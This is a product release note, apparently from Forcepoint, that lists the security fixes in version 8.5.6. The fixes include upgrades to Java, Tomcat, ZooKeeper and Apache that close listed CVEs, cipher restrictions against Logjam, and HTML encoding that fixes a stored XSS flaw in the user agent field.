Security Updates

Forcepoint Security Labs Analysts continually assess potential security vulnerabilities which can be introduced by third-party libraries. Security improvements have been made in several areas in version 8.5.6.

Updates Description
Missing Oracle critical patch updates for Java. Java upgrades to the latest version to fix the following CVEs post 1.8.0.242:
  • CVE-2020-14803
  • CVE-2021-23841
  • CVE-2021-3450
  • CVE-2021-2161
  • CVE-2021-2163
  • CVE-2020-14664
  • CVE-2020-14583
  • CVE-2020-14593
  • CVE-2020-14562
  • CVE-2020-14621
  • CVE-2020-14556
  • CVE-2020-14573
  • CVE-2020-14581
  • CVE-2020-14578
  • CVE-2020-14579
  • CVE-2020-14577
  • CVE-2020-14792
  • CVE-2020-14781
  • CVE-2020-14782
  • CVE-2020-14797
  • CVE-2020-14779
  • CVE-2020-14796
  • CVE-2020-14798
Apache Tomcat detects the default error page version number. Apache Tomcat running on the remote host, reported its version number on the default error pages making it vulnerable to attack. To fix this issue, default error pages are replaced with custom error pages to hide the version number.
Apache ZooKeeper updates to latest. Apache ZooKeeper upgrades to the 3.4.14 version to fix the following security vulnerabilities that occurred due to out of date:
  • CVE-2016-5017
  • CVE-2017-5637
  • CVE-2018-8012
  • CVE-2019-0201
Vulnerable version of plexus-utils (CASB). Plexus-utils upgrades to the 3.0.14 version to fix the CVE-2017-1000487 vulnerability.
Apache Tomcat Denial of Service (DoS) vulnerability. A vulnerability in Apache Tomcat allows an attacker to remotely trigger a DoS. This issue is fixed by upgrading to the Apache Tomcat 10.1.0-M6, 10.0.12, 9.0.54, 8.5.72 versions or to the latest version of Apache Tomcat.
Host header handling via proxy. Restricting multiple host headers via Proxy.
Forcepoint deprecated TLS version and SSL/TLS cipher policy violation. Postgres running on port 6432 on Forcepoint Security Manager uses deprecated TLS versions and SSL/TLS cipher suites that are not Forcepoint approved.
Apache commons text Java library vulnerable to RCE (CVE-2022-42889). Upgraded the version specified in CASB download 8.5.5 to the latest version to fix the Apache commons text Java library vulnerable (CVE-2022-42889) issue.
Multiple vulnerabilities in Apache 2.4.54.0. Web Security Apache version 2.4.54.0 needs to be upgraded to Apache 2.4.55 to fix the multiple vulnerabilities in Apache 2.4.54.0.
Apache vulnerabilities CVE-2023-25690, CVE-2023-27522. Web Security Apache version 2.4.55 or prior needs to be upgraded to Apache 2.4.56 to fix these Apache vulnerabilities CVE-2023-25690, CVE-2023-27522.
Apache Tomcat 9.0.70 vulnerabilities. Apache Tomcat versions prior to 9.0.70 were vulnerable as stated in these CVEs:
  • CVE-2023-46589
  • CVE-2023-45648
  • CVE-2023-42795
  • CVE-2023-42794
  • CVE-2023-44487
  • CVE-2023-41080
  • CVE-2023-28708
Tomcat version 9.0.86 was sourced from the official Apache Tomcat site: https://tomcat.apache.org/index.html

All SWG references to Tomcat were updated to point to the new version.

All Tomcat server.xml files were updated to reflect SWG cipher restrictions and TLS standards.
Logjam on Port 55866.

The LOGJAM vulnerability allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE, aka the "Logjam" issue.

We have now restricted the ciphers on port 55866 to "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256" and "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384". ECDHE ciphers are not vulnerable to the Logjam exploit.
Persistent Cross-Site Scripting via user agent field.

Cross-Site Scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website.

The Forcepoint Security Manager was vulnerable to XSS via the user agent field which can be manipulated by the end user and displayed in the transaction viewer.

The XSS vulnerability was mitigated by the use of HTML encoding of the user agent text. HTML encoding replaces certain characters that are semantically meaningful in HTML markup, with equivalent characters that can be displayed to the user. HTML encoding ensures that text is displayed correctly in the browser and not interpreted by the browser as HTML.

For the basic hardware and software requirements for your system to use this product, see System requirements for this version in the Deployment and Installation Center.